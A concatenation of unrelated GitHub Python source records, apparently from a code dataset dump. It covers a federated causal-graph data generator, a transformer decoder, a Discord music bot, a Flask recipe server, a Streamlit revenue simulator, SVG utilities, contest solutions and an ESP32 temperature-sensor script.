import DAG\nfrom .simulation import NonIID_Simulation, Multi_IID_Simulation\n\ndef data_gen(graph_type,\n node,\n edge,\n seed,\n num_client,\n gen_method,\n n,\n sem_type,\n dataset_property=None,\n method='nonlinear'):\n \n \"\"\"\n Simulate the random data property for each client.\n\n Parameters\n ----------\n graph_type : the type of graph, choose from ['er', 'sf'].\n node : number of nodes.\n edge : number of edges.\n seed : seed.\n num_client : number of the clients.\n gen_method : data generation type, choose from ['multiiid', 'noniid'].\n n : number of observations on each client.\n sem_type : the sem_type for iid data.\n dataset_property : the property of the data.\n method : linear or nonlinear data, choose from ['linear', 'nonlinear'].\n\n Returns\n -------\n B_true : the binary DAG graph (matrix).\n W_true : the weight matrices for each client.\n dataset : the generated dataset.\n data_all : put all data together.\n\n \"\"\"\n\n if graph_type == 'er':\n B_true, W_true = DAG.er_graph(n_nodes=node,\n n_edges=edge,\n weight_range=(0.5, 2.0),\n seed=seed,\n num_client=num_client)\n elif graph_type == 'sf':\n B_true, W_true = DAG.sf_graph(n_nodes=node,\n n_edges=edge,\n weight_range=(0.5, 2.0),\n seed=seed,\n num_client=num_client)\n else:\n assert False, \"invalid graph type {}\".format(graph_type)\n\n if gen_method == 'noniid':\n dataset, data_all = NonIID_Simulation(W_true,\n dataset_property,\n n,\n seed\n )\n elif gen_method == 'multiiid':\n dataset, data_all = Multi_IID_Simulation(W_true,\n sem_type,\n n,\n method,\n seed)\n\n else:\n assert False, \"invalid gen_method {}\".format(gen_method)\n\n return B_true, W_true, dataset, data_all","repo_name":"ErdunGAO/FedDAG","sub_path":"datasets/data_gen.py","file_name":"data_gen.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"}
{"seq_id":"16689484705","text":"import torch\nimport torch.nn as nn\n\nfrom model.competition.multi_head_attention import MultiHeadAttention\nfrom model.competition.positional_wise_feed_forward import PositionalWiseFeedForward\nfrom model.competition.positional_encoding import PositionalEncoding\n\nfrom model.tool.padding_mask import padding_mask\nfrom model.tool.sequence_mask import sequence_mask\n\n\nclass DecoderLayer(nn.Module):\n def __init__(self, model_dim, num_heads=8, ffn_dim=2048, dropout=0.0):\n super(DecoderLayer, self).__init__()\n\n self.attention = MultiHeadAttention(model_dim, num_heads, dropout)\n self.feed_forward = PositionalWiseFeedForward(model_dim, ffn_dim, dropout)\n\n def forward(self, dec_inputs, enc_outputs, self_attn_mask=None, context_attn_mask=None):\n\n dec_output, self_attention = self.attention(dec_inputs, dec_inputs, dec_inputs, self_attn_mask)\n dec_output, context_attention = self.attention(enc_outputs, enc_outputs, dec_output, context_attn_mask)\n\n dec_output = self.feed_forward(dec_output)\n\n return dec_output, self_attention, context_attention\n\n\nclass Decoder(nn.Module):\n def __init__(self, vocab_size, max_seq_len, num_layers=6, model_dim=512, num_heads=8, ffn_dim=2048, dropout=0.0):\n\n super(Decoder, self).__init__()\n\n self.num_layers = num_layers\n\n self.decoder_layers = nn.ModuleList(\n [DecoderLayer(model_dim, num_heads, ffn_dim, dropout) for _ in range(num_layers)]\n )\n\n self.seq_embedding = nn.Embedding(vocab_size + 1, model_dim, padding_idx=0)\n self.pos_embedding = PositionalEncoding(model_dim, max_seq_len)\n\n def forward(self, inputs, inputs_len, enc_output, 
context_attn_mask=None):\n output = self.seq_embedding(inputs)\n output += self.pos_embedding(inputs_len)\n\n self_attention_padding_mask = padding_mask(inputs, inputs)\n\n seq_mask = sequence_mask(inputs)\n self_attn_mask = torch.gt((self_attention_padding_mask + seq_mask), 0)\n\n self_attentions = []\n context_attentions = []\n for decoder in self.decoder_layers:\n output, self_attn, context_attn = decoder(\n output, enc_output, self_attn_mask, context_attn_mask)\n self_attentions.append(self_attn)\n context_attentions.append(context_attn)\n\n return output, self_attentions, context_attentions","repo_name":"CerryXu/pytorch-transformer","sub_path":"model/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"37235129117","text":"#! /usr/bin/env python\n\n'''\nAUTHOR: Molly Peeples\nDATE: 10/29/2015\nNAME: spectator.py\nDESCRIPTION: gets demographics and makes quick look plots and tables for Hubble/COS data (optimized for FUV)\n'''\n\nimport argparse\nimport sys\n\nimport drive_quick_look \nimport scrape_headers\n\ndef parse_args():\n '''\n Parse command line arguments. Returns args object.\n '''\n parser = argparse.ArgumentParser(description = \\\n \"scrapes headers and makes quicklooks for everything in 'targets.list' file\")\n parser.add_argument('targets', metavar='list', type=str, action='store',\n help=\"\"\"targets.list is the file to be read in;\n first column = flag (0,1) if target is to be used,\n second column = target/directory name\"\"\")\n\n parser.add_argument('--clobber', dest='clobber', action='store_true')\n parser.add_argument('--no-clobber', dest='clobber', action='store_false', help=\"default is no clobbering\")\n parser.set_defaults(clobber=False)\n\n args = parser.parse_args()\n return args\n\n\n\n#-----------------------------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n args = parse_args()\n targets = (args.targets, args.clobber) \n\n scrape_headers.scrape_headers(args.targets)\n drive_quick_look.drive_quick_look(targets)\n\n sys.exit(\"\"\"\n \n ~~~~~~~*~*~*~*~~~~~~~~ ~*~*~*~*~~~~~~~~~~~~~\n ~~~~~~~*~*~*~*~~~~~~ all done!!!! spectra are fun! 
~~~~~~~~~~~~~~~~~~~\n ~~~~~~~*~*~*~*~~~~~~~~ ~*~*~*~*~~~~~~~~~~~~~\n \"\"\")\n","repo_name":"oscarlwz/hsla","sub_path":"spectator.py","file_name":"spectator.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"3379281465","text":"import logging\n\nfrom pecan import expose, request\nfrom pecan.ext.notario import validate\nfrom uuid import uuid4\n\nfrom ceph_installer.controllers import error\nfrom ceph_installer.tasks import call_ansible\nfrom ceph_installer import schemas\nfrom ceph_installer import models\nfrom ceph_installer import util\n\nlogger = logging.getLogger(__name__)\n\n\nclass RGWController(object):\n\n @expose('json')\n def index(self):\n # TODO: allow some autodiscovery here so that clients can see what is\n # available\n return dict()\n\n @expose(generic=True, template='json')\n def install(self):\n error(405)\n\n @install.when(method='POST', template='json')\n @validate(schemas.install_schema, handler=\"/errors/schema\")\n def install_post(self):\n hosts = request.json.get('hosts')\n identifier = str(uuid4())\n extra_vars = util.get_install_extra_vars(request.json)\n verbose_ansible = request.json.get('verbose', False)\n task = models.Task(\n request=request,\n identifier=identifier,\n endpoint=request.path,\n )\n # we need an explicit commit here because the command may finish before\n # we conclude this request\n models.commit()\n kwargs = dict(\n extra_vars=extra_vars,\n tags=\"package-install\",\n verbose=verbose_ansible,\n )\n call_ansible.apply_async(\n args=([('rgws', hosts)], identifier),\n kwargs=kwargs,\n )\n\n return task\n\n @expose(generic=True, template='json')\n def configure(self):\n error(405)\n\n @configure.when(method='POST', template='json')\n @validate(schemas.rgw_configure_schema, handler=\"/errors/schema\")\n def configure_post(self):\n hosts = [request.json['host']]\n # even with configuring we need to tell ceph-ansible\n # if we're working with upstream ceph or red hat ceph storage\n verbose_ansible = request.json.get('verbose', False)\n extra_vars = util.get_install_extra_vars(request.json)\n monitor_hosts = util.parse_monitors(request.json[\"monitors\"])\n # this update will take everything in the ``request.json`` body and\n # just pass it in as extra-vars. That is the reason why optional values\n # like \"calamari\" are not looked up explicitly. 
If they are passed in\n # they will be used.\n extra_vars.update(request.json)\n if 'verbose' in extra_vars:\n del extra_vars['verbose']\n if 'conf' in extra_vars:\n extra_vars['ceph_conf_overrides'] = request.json['conf']\n del extra_vars['conf']\n if \"cluster_name\" in extra_vars:\n extra_vars[\"cluster\"] = extra_vars[\"cluster_name\"]\n del extra_vars[\"cluster_name\"]\n del extra_vars['host']\n extra_vars.pop('interface', None)\n extra_vars.pop('address', None)\n identifier = str(uuid4())\n task = models.Task(\n request=request,\n identifier=identifier,\n playbook=\"infrastructure-playbooks/rgw-standalone.yml\",\n endpoint=request.path,\n )\n # we need an explicit commit here because the command may finish before\n # we conclude this request\n models.commit()\n kwargs = dict(\n extra_vars=extra_vars,\n skip_tags=\"package-install\",\n verbose=verbose_ansible,\n )\n call_ansible.apply_async(\n args=([('rgws', hosts), ('mons', monitor_hosts)], identifier),\n kwargs=kwargs,\n )\n\n return task\n","repo_name":"ceph/ceph-installer","sub_path":"ceph_installer/controllers/rgw.py","file_name":"rgw.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"32417863601","text":"import requests\n\ndef fetch_photo():\n #fetch new image from lorem picsum\n filename = '../imagecache/todayspic.jpg'\n request = requests.get(\"https://picsum.photos/800\", stream=True)\n if request.status_code == 200:\n with open(filename, 'wb') as image:\n for c in request:\n image.write(c)\n else:\n print(\"Unable to download image, using previous cached image\")\n","repo_name":"StephenMC27/CS_321_Group_Project","sub_path":"src/photo.py","file_name":"photo.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73027876624","text":"# Crie um programa que leia o nome e o preço de vários produtos. O programa\r\n# deverá perguntar se o usuário vai continuar ou não. No final, mostre:\r\n# A) Qual é o total gasto na compra.\r\n# B) Quantos produtos custam mais de R$1000.\r\n# C) Qual é o nome do produto mais barato\r\n #INCOMPLETO\r\ncont = 0\r\nprecoTotal = 0\r\nwhile True:\r\n nome = input('Digite o nome do produto: ')\r\n precoProduto = float(input('Digite o preço do produto: '))\r\n precoTotal = precoProduto + precoTotal\r\n if precoProduto >= 1000:\r\n cont += 1\r\n resp = input('Quer continuar [S/N]? 
').strip().lower()[0]\r\n if resp != 's':\r\n break\r\nprint(f'''\r\nO total gasto na compra é de: {precoTotal}\r\n{cont} produtos custam mais de R$ 1000\r\nO nome do produto mais barato é:\r\n''')","repo_name":"Bianca-22/Blue_T3C6-mod1","sub_path":"Aula 07/Exercício 07.py","file_name":"Exercício 07.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4122011840","text":"import discord\nfrom discord.ext import commands\nfrom discord import Client\nfrom discord.ext.commands import Context\nfrom discord import VoiceClient\nfrom discord import Embed\n\nimport youtube_dl\n\n\nclass Music(commands.Cog):\n def __init__(self, client: Client) -> None:\n self.client = client\n self.title = None\n self.url = None\n\n def set_url(self, url: str):\n self.url = url\n\n def set_title(self, title: str):\n self.title = title\n\n def set_thumbnail(self, thumbnail: str):\n self.thumbnail = thumbnail\n\n def clear_info(self):\n self.title = None\n self.url = None\n self.thumbnail = None\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"Music Cog\")\n\n @commands.command(name=\"leave\")\n async def leave(self, ctx: Context):\n if ctx.author.voice is None:\n await ctx.reply('No estas en ningun canal de voz')\n return\n\n await ctx.guild.voice_client.disconnect()\n\n @commands.group(name=\"msc\", invoke_without_command=True)\n async def msc(self, ctx: Context):\n pass\n\n @msc.command(name=\"play\")\n async def play(self, ctx: Context, url):\n\n if ctx.author.voice is None:\n await ctx.reply('No estas en ningun canal de voz')\n return\n\n await ctx.author.voice.channel.connect()\n\n vc: VoiceClient = ctx.voice_client\n\n FFMPEG_OPTIONS = {\n 'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'\n }\n YDL_OPTIONS = {'format': 'bestaudio'}\n\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\n info = ydl.extract_info(url=url, download=False)\n url2 = info['formats'][0]['url']\n self.set_title(info.get('title', None))\n self.set_url(url)\n self.set_thumbnail(info['thumbnails'][-1]['url'])\n\n source = await discord.FFmpegOpusAudio.from_probe(\n url2, **FFMPEG_OPTIONS)\n vc.play(source, after=lambda e: self.clear_info())\n\n @msc.command(name=\"pause\")\n async def pause(self, ctx: Context):\n if ctx.author.voice is None:\n await ctx.reply('No estas en ningun canal de voz')\n return\n\n vc: VoiceClient = ctx.voice_client\n\n if vc is None:\n await ctx.reply('Nada reproduciendo')\n else:\n vc.pause()\n\n @msc.command(name=\"resume\")\n async def resume(self, ctx: Context):\n if ctx.author.voice is None:\n await ctx.reply('No estas en ningun canal de voz')\n return\n\n vc: VoiceClient = ctx.voice_client\n\n if vc is None:\n return\n\n if vc.is_paused():\n vc.resume()\n\n @msc.command(name=\"info\")\n async def info(self, ctx: Context):\n if not self.title and not self.url:\n await ctx.reply('Nada reproduciendo')\n return\n\n embed = Embed()\n embed.title = self.title\n embed.url = self.url\n embed.description = self.url\n embed.set_image(url=self.thumbnail)\n\n await ctx.reply(embed=embed)\n\n\ndef setup(client):\n client.add_cog(Music(client))\n","repo_name":"iLegendTz/Wattbot-py","sub_path":"Cogs/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2478464879","text":"def areAlmostEquivalent(s, t):\n # Write your code here\n arr 
= []\n    countS = [0]*26\n    countT = [0]*26\n    for i in s:\n        print(i,\"i\")\n        countS[ord(i) - ord(\"a\")]+=1\n    for i in t:\n        countT[ord(i) - ord(\"a\")] +=1\n    for j in range(26):\n        if (countS[j] - countT[j]) <= 3:\n            arr.append(\"YES\")\n        else:\n            arr.append(\"NO\")\n    return arr\n","repo_name":"thenunachi/dailyPracticeLeetCode","sub_path":"leetcode/strings/f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"43571534334","text":"from suggester import *\nfrom flask import Flask, json, jsonify\nfrom classif import *\nfrom invert_ind import *\n\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\n\n@app.route('/get_ingr/<prefix>', methods=['GET'])\ndef get_ingr(prefix):\n    prefix = prefix.lower().replace('ё', 'е')\n    my_str = ', '.join(list(data[data.name==prefix].ingredients)[0])\n    return my_str\n\n@app.route('/get_suggest/<prefix>', methods=['GET'])\ndef suggestions(prefix):\n    suggest = suggester(root, prefix)\n    sug_string = ''\n    for i in suggest:\n        sug_string += i + '<br>
    '\n    return sug_string\n\n@app.route('/get_best_suggest/<prefix>', methods=['GET'])\ndef rat(prefix):\n    suggest = rating(root, prefix, 10, data)\n    sug_string = ''\n    for i in suggest:\n        sug_string += i + '<br>
    '\n    return sug_string\n\n@app.route('/classif/<prefix>', methods=['GET'])\ndef pred_class(prefix):\n    return pred(prefix,clf,ingr_l)\n\n@app.route('/find_rec/<prefix>', methods=['GET'])\ndef get_rec(prefix):\n    str_rec = ''\n    set_rec = get_recipes_many(prefix,df)\n    for i in set_rec:\n        str_rec += i + '<br>
    '\n return str_rec\n\nif __name__ == \"__main__\":\n\n #suggester\n data = pd.read_json('cook_dataset.json')\n data['name'] = data['name'].apply(lambda x: x.lower().replace('ё', 'е'))\n root = TrieNode('*')\n for i in data['name']:\n add(root, i)\n #classif\n (clf,ingr_l) = classif()\n #invert_ind\n with open('df_classif.pickle', 'rb') as f:\n df = pickle.load(f)\n app.run()\n","repo_name":"Darya7335/cookbook","sub_path":"proj_serv.py","file_name":"proj_serv.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33633676416","text":"from bing_utils import SimpleSearch\nfrom multiprocessing import Process\nimport json\n\nterms = ['scrapping', 'test typefile: pdf inurl: *.pdf', 'enthec']\n\ndef ThreadSearch(term, n_pages=1):\n print(f'[i] Scrapping term {term} with total pages: {n_pages}')\n data = []\n for n in range(n_pages):\n data.extend(SimpleSearch(term, n_page=n + 1))\n name = term.replace(' ', '-').replace(':', '').replace('*', '').replace('.','')\n with open(f'json_files/{name}.json', 'w', encoding='utf-8') as file:\n file.write(json.dumps(data, ensure_ascii=False))\n\nif __name__ == '__main__':\n for term in terms:\n Process(target=ThreadSearch, args=[term, 5]).start()","repo_name":"JosLeDeta/bing-scrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16652591507","text":"from .svgTools import *\nfrom vectorrvnn.utils.boxes import * \nfrom copy import deepcopy\nfrom functools import reduce\nimport svgpathtools as svg\n\ndef toPath (lines) : \n return svg.Path(*lines)\n\ndef toLines (path) : \n return path._segments\n\ndef rotate (tree, degrees, pt) :\n globalTransform(tree.doc,\n dict(transform=f'rotate({degrees:.3f} {pt.real:.3f} {pt.imag:.3f})'))\n for i, line in enumerate(tree.lines) : \n tree.lines[i] = toLines(toPath(line).rotated(degrees, pt))\n normalize(tree)\n tree.recalculateBoxes()\n return tree \n\ndef translate(tree, tx, ty) : \n globalTransform(tree.doc,\n dict(transform=f'translate({tx:.3f} {ty:.3f})'))\n for i, line in enumerate(tree.lines) : \n tree.lines[i] = toLines(toPath(line).translated(complex(tx, ty)))\n normalize(tree)\n tree.recalculateBoxes()\n return tree\n\ndef scale(tree, sx, sy=None) : \n \"\"\" Modify this because it is more convenient to scale the document in place \"\"\"\n if sy is None : \n sy = sx\n globalTransform(tree.doc,\n dict(transform=f'scale({sx:.3f} {sy:.3f})'))\n for j, _ in enumerate(tree.lines) :\n for i, line in enumerate(tree.lines[j]) : \n st = complex(line.start.real / sx, line.start.imag / sy)\n en = complex(line.end.real / sx, line.end.imag / sy)\n tree.lines[j][i] = svg.Line(start=st, end=en)\n normalize(tree)\n tree.recalculateBoxes()\n return tree\n\ndef modAttr (tree, attr, transformer) : \n \"\"\" Modify attribute for all paths in document\n\n Examples : \n 1. modAttr(tree, 'opacity', lambda k, x: '0.5') # set opacity to 0.5 \n 2. modAttr(tree, 'stroke-width', lambda k, x : '10') # set stroke-width to 10\n 3. 
modAttr(tree, 'fill', lambda k, x : '#ff0000') # set fill to red for all paths\n \"\"\"\n root = tree.doc.tree.getroot()\n for elt in root.iter() : \n if elt.tag in PATH_TAGS : \n xmlAttributeSet(elt, attr, transformer(attr, elt))\n return tree\n\ndef modAttrs (tree, attrDict) :\n \"\"\" apply modifications to attributes simultaneously \"\"\"\n root = tree.doc.tree.getroot()\n for elt in root.iter() : \n if elt.tag in PATH_TAGS : \n for k, v in attrDict.items():\n xmlAttributeSet(elt, k, v(k, elt))\n return tree\n\ndef normalize (tree) : \n box = union([pathBBox(svg.Path(*lines)) for lines in tree.lines])\n setDocBBox(tree.doc, box.normalized() * 1.2)\n","repo_name":"Vrroom/vectorrvnn","sub_path":"vectorrvnn/utils/svg/svgDataTransforms.py","file_name":"svgDataTransforms.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"7190174728","text":"# 2098. 외판원 순회\n\nfrom sys import stdin\n\n\ndef dfs(cur, rec): # 현재 위치, 방문 기록\n if rec == (1<0: \n c,c2=st.columns(2)\n discount=c.slider(\"Discount on Target Segment:\",min_value=0,max_value=50,step=5,value=5)\n increase=c2.slider(\"Anticipated Sales Increase on Target Segment:\",min_value=0,max_value=50,value=20)\n df2=getRevSplit(segTarget,discount,increase)\n dfAll=df2.loc[df2['TYPE'].isin(['ALL','EXCEPT'])] \n dfAll=dfAll.groupby('PR',as_index=False).sum()\n dfAll.sort_values(by=['PR'],inplace=True)\n dfAll=dfAll[['PR','REV']]\n result = dfAll.to_json(orient=\"values\")\n parsed = json.loads(result)\n dfDisc=df2.loc[df2['TYPE'].isin(['ALL','DISC'])]\n dfDisc=dfDisc.groupby('PR',as_index=False).sum()\n dfDisc.sort_values('PR')\n dfDisc=dfDisc[['PR','REV']]\n resultDisc = dfDisc.to_json(orient=\"values\")\n parsedDisc = json.loads(resultDisc) \n cat=json.loads(dfDisc.PR.to_json(orient=\"values\"))\n co,co1=st.columns(2)\n cur=dfAll.sum().REV\n sim=dfDisc.sum().REV\n co.metric(\"Revenue Current\",\"{:,.0f}€\".format(cur).replace(',', ' '))\n co1.metric(\"Revenue Impact\",\"{:,.0f}€\".format(sim).replace(',', ' '),str(round(((sim/cur)-1)*100,2)+0.01) + \"%\")\n chartdef2={\n \"chart\": {\n \"type\": 'column',\n \"zoomType\": 'x',\n 'zooming': {\n 'mouseWheel': False\n }\n },\n \"xAxis\": {\n \"type\": 'category'\n },\n \"yAxis\":{\n \"title\":\"\"\n },\n \"title\": {\n \"text\": ''\n },\n \"series\": [\n { \"type\": 'column',\n \"dataSorting\": {\n \"enabled\": True,\n \"matchByName\": True\n },\n \"name\":\"Actual Revenue\",\n \"data\": parsed\n },\n { \"type\": 'column',\n \"dataSorting\": {\n \"enabled\": True,\n \"matchByName\": True\n },\n \"name\":\"Simulated Revenue\",\n \"data\": parsedDisc,\n \"color\":\"red\"\n }\n ]\n \n }\n hct.streamlit_highcharts(chartdef2)\n st.markdown(\"## Trigger Marketing Campaign\") \n seg=\",\".join(\"'{0}'\".format(w) for w in segTarget)\n query=f'''SELECT RFM.CUSTOMER_ID, RFM.SEGMENT, CUST.CUSTOMER_EMAIL, '{discount}%' as DISCOUNT\n FROM \"bdm_rfm\" as RFM\n INNER JOIN \"bdm_customers\" as CUST\n ON RFM.CUSTOMER_ID=CUST.CUSTOMER_ID\n WHERE RFM.actual_state=true AND RFM.SEGMENT in ({seg});\n '''\n dfCust =pd.DataFrame(session.sql(query).collect())\n st.dataframe(dfCust,use_container_width=True)\n colB,cc=st.columns(2) \n bck=colB.selectbox(\"Select Keboola Bucket:\",key=\"bck\",options= list(map(lambda v: v['id'], buckets)))\n date_time = datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")\n value = kb.keboola_upload(\n keboola_URL=keboola_URL,\n keboola_key=keboola_key,\n keboola_table_name=\"Marketing_Discount_\" 
+date_time,\n keboola_bucket_id=bck,\n keboola_file_path=saveFile(dfCust),\n keboola_primary_key=[\"\"],\n label=\"UPLOAD TABLE\",\n key=\"two\"\n )\n value\n#TODO\n","repo_name":"aalteirac/streamlit_keboola_vhol_pc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121489746","text":"# https://atcoder.jp/contests/dp/submissions/13594958\n# C - Vacation\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n n = int(input())\n ABC = [list(map(int, input().split())) for _ in range(n)]\n\n dp = [[0 for _ in range(3)] for _ in range(n)]\n dp[0][0] = ABC[0][0]\n dp[0][1] = ABC[0][1]\n dp[0][2] = ABC[0][2]\n\n for i in range(1, n):\n a = ABC[i][0]\n b = ABC[i][1]\n c = ABC[i][2]\n\n dp[i][0] = max(dp[i][0], dp[i - 1][1] + a, dp[i - 1][2] + a)\n dp[i][1] = max(dp[i][1], dp[i - 1][0] + b, dp[i - 1][2] + b)\n dp[i][2] = max(dp[i][2], dp[i - 1][0] + c, dp[i - 1][1] + c)\n\n print(max(dp[n - 1][0], dp[n - 1][1], dp[n - 1][2]))\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/EDPC/EDPC-C.py","file_name":"EDPC-C.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11824490649","text":"from util import read\nimport numpy as np\nfrom collections import defaultdict, deque, Counter\n\nday = '11'\nprint(f'Day {day}')\nprint('------')\nx = 5153 # grid serial number\ngrid_serial_no = 5153\n\nc = np.zeros((300, 300))\n\n\n\ndef computePowerLevel(i,j):\n \"\"\"\n 0 <= j,i <= 299\n 1 <= x,y <= 300\n \"\"\"\n x, y = j + 1, i + 1\n rackID = x + 10\n power_level = rackID * y\n power_level += grid_serial_no\n power_level *= rackID\n power_level = int((power_level % 1000) / 100)\n power_level -= 5\n return power_level\n\n\nc = np.array([[computePowerLevel(i,j) for j in range(300)]\n for i in range(300)])\n\ndef sum_convolve(m, w=1):\n o = np.zeros((m.shape[0]-w+1, m.shape[1]-w+1))\n for i in range(o.shape[0]):\n for j in range(o.shape[1]):\n o[i,j] = m[i:i+w, j:j+w].sum()\n return o\n\ndef getMaxPower(w):\n if w < 1:\n raise ValueError('Require w >= 1')\n elif w == 1:\n cc = c\n else:\n cc = sum_convolve(c, w)\n cc_max = cc.max()\n i, j = np.where(cc == cc_max)\n return [cc_max, j[0]+1, i[0] + 1, w]\n \n# Part 1\nprint(getMaxPower(3))\n\n\ndef summedAreaTable(c):\n sat = np.array([[c[:i, :j].sum() for j in range(c.shape[1])]\n for i in range(c.shape[0])])\n return sat\n\ndef computeArea(S, i, j, w):\n if (i == 0) and (j == 0):\n return S[w-1, w-1]\n elif i == 0:\n return S[i+w-1, j+w-1] - S[i+w-1, j-1]\n elif j == 0:\n return S[i+w-1, j+w-1] - S[i-1, j+w-1]\n else:\n return S[i+w-1, j+w-1] + S[i-1, j-1] - S[i+w-1, j-1] - S[i-1, j+w-1]\n return\n\ndef getMaxPowerSize(c, S=None, w=3):\n if S is None:\n S = summedAreaTable(c)\n all_powers = [[computeArea(S, i, j, w)\n for j in range(S.shape[1]-w+1)]\n for i in range(S.shape[0]-w+1)]\n all_powers = np.array(all_powers)\n all_powers_max = all_powers.max()\n i_max, j_max = np.where(all_powers == all_powers_max)\n return [all_powers_max, j_max[0] + 1, i_max[0]+1, w]\n\nS = summedAreaTable(c)\nP = np.array([getMaxPowerSize(c, S, w) for w in range(1, 301)])\nprint('summed area table:', P[np.argmax(P[:, 0])])\n\n# Part 2\nsizes = range(1, 301)\npowers = []\nfor j, w in enumerate(sizes):\n 
powers.append(getMaxPower(w))\n # sort of arbitrary\n if (j > 25) and (powers[j][0] < powers[j-1][0]):\n break\npowers = np.array(powers)\nprint('arbitrary cut-off', powers[np.argmax(powers[:, 0])])\n\n\n","repo_name":"asberk/aoc18","sub_path":"d11.py","file_name":"d11.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74931876945","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n\n元件:\n ESP32 DevkitV1\n 128*64 SSD1306 OLED SPI/IIC\n 全彩RGB灯 供电脚不够接的话,可以接gpio2供电,跟板载LED电平一致\n DHT22\n功能:\n BlinkerAPP远程获取DHT22温湿度数据、远程控制RGB颜色亮度、oled本地实时显示时间+温度和湿度。\n'''\nfrom dht import DHT22\nfrom machine import Pin,PWM,SoftSPI,Timer\nfrom Blinker.Blinker import Blinker, BlinkerButton, BlinkerNumber, BlinkerRGB\nfrom Blinker.BlinkerDebug import *\nfrom ssd1306 import SSD1306_SPI\n\n\n#软SPI,初始化oled \nspi = SoftSPI(baudrate=80000000, polarity=0, phase=0, sck=Pin(18,Pin.OUT), mosi=Pin(23,Pin.OUT), miso=Pin(33)) #sck(D0)=18 mosi(D1)=23 miso=unused\noled = SSD1306_SPI(128, 64, spi, Pin(4),Pin(5), Pin(32)) #4=DC 5=RST unused=CS\n\n#初始化RGB灯珠引脚,复用PWM,设置频率\nled_r = Pin(25, Pin.OUT)\nled_b = Pin(26, Pin.OUT)\nled_g = Pin(27, Pin.OUT)\npwm_led_r = PWM(led_r)\npwm_led_r.freq(1000)\npwm_led_g = PWM(led_g)\npwm_led_g.freq(1000)\npwm_led_b = PWM(led_b)\npwm_led_b.freq(1000)\n\ndht = DHT22(Pin(13))\t#设置DHT22引脚\n\np2 = Pin(2, Pin.OUT)\t#板载led\n\n\nauth = 'Your Device Secret Key' #Blinker设备秘钥\nssid = 'Your WiFi network SSID or name' #SSID:WiFi名称\npswd = 'Your WiFi network WPA password or WEP key' #WIFI 密码\n\n\n\n#Debug\nBLINKER_DEBUG.debugAll()\n#初始化硬件Wifi接入\nBlinker.mode('BLINKER_WIFI')\nBlinker.begin(auth, ssid, pswd)\n#数字组件, 用于发送数据到APP/显示数字数据\nHUMI = BlinkerNumber('humi')\nTEMP = BlinkerNumber('temp')\n#按键组件在App中可以设置 按键/开关/自定义 三种模式\nbutton1 = BlinkerButton('led0')\n#颜色组件, 用于读取/设置RGB及亮度值\nrgb1 = BlinkerRGB(\"RGBKey\")\n\nhumi_read = 0\t#读取湿度\ntemp_read = 0\t#读取温度\n\ndef heartbeat_callback():\n \"\"\"心跳包回调函数,用户在线时每分钟触发一次\"\"\"\n #清屏\n oled.fill(0)\n #dht22测量一次\n dht.measure()\n temp_read = dht.temperature()\t#读取温度\n humi_read = dht.humidity()\t\t#读取湿度\n \n #时间+温度+湿度\n time_tex = str(Blinker.year())+'-'+str(Blinker.month())+'-'+str(Blinker.mday())+' '+str(Blinker.hour())+':'+('0'+str(Blinker.minute()))[-2:]\n t_tex = \"T:\"+str(temp_read)+\"C\"\n h_tex = \"H:\"+str(humi_read)[:4]+'%'\n #oled显示时间+温度+湿度\n oled.text(time_tex,0,6)\n oled.text(t_tex, 40, 16)\n oled.text(h_tex, 40, 26)\n oled.show()\t\t\t#OLED显示\n BLINKER_LOG('||Humidity:',humi_read,\"||Temperature:\",temp_read,\"||\")\t#串口Blinker输出日志\n HUMI.print(humi_read)\t#发送湿度数据到APP/显示数字数据\n TEMP.print(temp_read)\t#发送温度数据到APP/显示数字数据\n\n\ndef button1_callback(state):\n '''按键回调(内置led的开关)'''\n BLINKER_LOG('get button state: ', state)\t#串口Blinker输出日志\n button1.print(state)\t\t#发送button1状态\n p2.value(1-p2.value())\t\t#按键翻转电平\n 